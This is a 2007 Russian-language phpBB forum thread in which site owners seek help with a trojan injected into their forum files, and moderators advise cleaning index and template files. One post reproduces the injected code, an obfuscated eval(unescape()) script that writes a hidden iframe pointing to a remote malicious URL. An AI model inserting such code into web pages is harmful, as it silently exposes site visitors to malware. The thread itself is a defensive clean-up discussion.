Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).

Сообщение Rayden 01.10.2007 21:19

и мой SAV молчит
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
Rayden
Модератор
Модератор
 
Сообщения: 2683
Зарегистрирован: 27.06.2005 1:07


Сообщение Петрович 02.10.2007 9:48

rxu писал(а):А мой НОД молчит. Вирусные базы - сегодняшние...

Базы от 29.09. Сегодня не ругнулся, промолчал.
Петрович
phpBB 1.4.4
 
Сообщения: 85
Зарегистрирован: 21.11.2006 20:27
Откуда: Новосибирск

Сообщение vintnenarkoman 07.10.2007 16:07

выручайте плз. У знакомых на форуме вирус есть, avast! на него ругается и дальше не пускает, сейчас решил проверить свой форум заразил или нет и понять не могу заразил или нет, avast! не ругается, форум работает нормально вроде, но вот в index.php в конце нашел такую штуку -
Код: Выделить всё
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74
%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72
%61%6d%65%20%6e%61%6d%65%3d%30%30%36%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%77%69%6e%68%65%78
%2e%6f%72%67%2f%74%64%73%2f%69%6e%2e%63%67%69%3f
%33%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d
%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%34%33
%34%34%30%29%2b%27%32%39%34%32%31%5c%27%20%77%69
%64%74%68%3d%33%32%36%20%68%65%69%67%68%74%3d%34
%34%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c
%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72
%61%6d%65%3e%27%29")); </script>


вот типерь голову ломаю вирус али нет :( подскажите пожалуйста, мне уже сейчас начинать боятся или попозже? навсякий случай вот ссылка на форум - http://censored.formulao2.ru/forum/index.php

Alek$: вставил переносы строк в коде, чтобы страница не разъезжалась. А то неэстетично как-то :)
vintnenarkoman
phpBB 1.0.0
 
Сообщения: 7
Зарегистрирован: 21.09.2007 22:04

Сообщение Alek$ 07.10.2007 16:15

Вирус.
Useful links: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.


Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
phpBB 3.0.2 с предустановленной русификацией
Аватара пользователя
Alek$
Модератор
Модератор
 
Сообщения: 1598
Зарегистрирован: 03.08.2005 13:46
Откуда: Новосибирск

Сообщение Браток 08.10.2007 12:29

Вчера такой же вирус(как выше в цитате) заразил, при этом форум упал. Нод32 молчит в тряпочку.
Но заражение произошло с другого компа, вообще без антивируса комп второй был. И кому интересно для того что бы заразиться достаточно иметь сессию на компе к форуму с админскими правами, т.к по заверению владельца этого компа, в менеджере пароля не было, т.к он был не задолго до этого перестановлен и не использовался ещё.
Браток
phpBB 1.4.1
 
Сообщения: 47
Зарегистрирован: 17.06.2006 2:47

Сообщение vintnenarkoman 08.10.2007 17:49

сейчас упал и форум и сайт... что делать незнаю=((( алярм!!!

Добавлено спустя 2 часа 47 минут 18 секунд:

как всё оживить???? если полностью скопировать папку с сайтом и форумом на комп и все файлы поправить а потом обратно на сервак залить сможет это помочь?
vintnenarkoman
phpBB 1.0.0
 
Сообщения: 7
Зарегистрирован: 21.09.2007 22:04

Сообщение crash 08.10.2007 17:51

смотря что вам поломали
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Support Team Leader
 
Сообщения: 6460
Зарегистрирован: 07.07.2004 17:12
Откуда: Мирный

Сообщение vintnenarkoman 09.10.2007 9:00

да еслиб я знал :cry: сейчас даже не представляю что делать=((( сейчас при входе на сайт пишет что виртуальный сервер отсутствует или не функционирует.... что делать и куда лезть вапще не представляю=((( может чтото надо сделать в myadmin-e? Друзья! если ктото с этим сталкивался, подскажите по шагам что и где делать :cry:
vintnenarkoman
phpBB 1.0.0
 
Сообщения: 7
Зарегистрирован: 21.09.2007 22:04

Сообщение Alek$ 10.10.2007 17:23

vintnenarkoman
поинтересуйтесь у хостера, не отключал ли он ваш сайт.
vintnenarkoman писал(а):если полностью скопировать папку с сайтом и форумом на комп и все файлы поправить а потом обратно на сервак залить

Скорее всего, поможет.
Useful links: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.


Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
phpBB 3.0.2 с предустановленной русификацией
Аватара пользователя
Alek$
Модератор
Модератор
 
Сообщения: 1598
Зарегистрирован: 03.08.2005 13:46
Откуда: Новосибирск

Сообщение vintnenarkoman 11.10.2007 9:44

спасибо, чистка апсолютно всех файлов index.php и index.html помогла. типерь html всегда будет выключен, эксплоита подкинули скорее всего именно так...
vintnenarkoman
phpBB 1.0.0
 
Сообщения: 7
Зарегистрирован: 21.09.2007 22:04

Сообщение PanAm 12.10.2007 13:38

Подскажите, а в PHP файлах, после закрывающего тега ?> сервер продолжает обработку скрипта?
Аватара пользователя
PanAm
phpBB 1.4.1
 
Сообщения: 43
Зарегистрирован: 01.08.2007 11:52

Сообщение Alek$ 13.10.2007 14:52

PanAm
если он после ?> найдет <?php или <?, то он проболжит обработку до следующего ?> и так далее. Все остальное он воспринимает как обычный html
Useful links: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.


Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
phpBB 3.0.2 с предустановленной русификацией
Аватара пользователя
Alek$
Модератор
Модератор
 
Сообщения: 1598
Зарегистрирован: 03.08.2005 13:46
Откуда: Новосибирск

Сообщение Forester4x4 17.12.2007 13:07

чейто не пойму я ....
послу удаления скрипта
по ссылке на форум - выдается чистая страница с кодом
Код: Выделить всё
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"></HEAD>
<BODY></BODY></HTML>

:shock:

Добавлено спустя 47 минут 54 секунды:
Последний раз редактировалось Forester4x4 17.12.2007 13:29, всего редактировалось 1 раз.
Аватара пользователя
Forester4x4
phpBB 1.4.0
 
Сообщения: 34
Зарегистрирован: 30.05.2007 22:13
Откуда: msk

Сообщение Alek$ 17.12.2007 13:21

Значит, где-то еще зло сидит.
Сделайте, например контекстный поиск по файлам по слову HEAD и посмотрите, что найдется.
Useful links: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.


Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
phpBB 3.0.2 с предустановленной русификацией
Аватара пользователя
Alek$
Модератор
Модератор
 
Сообщения: 1598
Зарегистрирован: 03.08.2005 13:46
Откуда: Новосибирск

Сообщение Forester4x4 17.12.2007 13:37

Alek$
спасибо...
исправлено путем удаления вервой строки из /forum/templates/Charcoal2/admin/page_header.tpl
Аватара пользователя
Forester4x4
phpBB 1.4.0
 
Сообщения: 34
Зарегистрирован: 30.05.2007 22:13
Откуда: msk

Пред.След.

Вернуться в phpBB-пространство

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0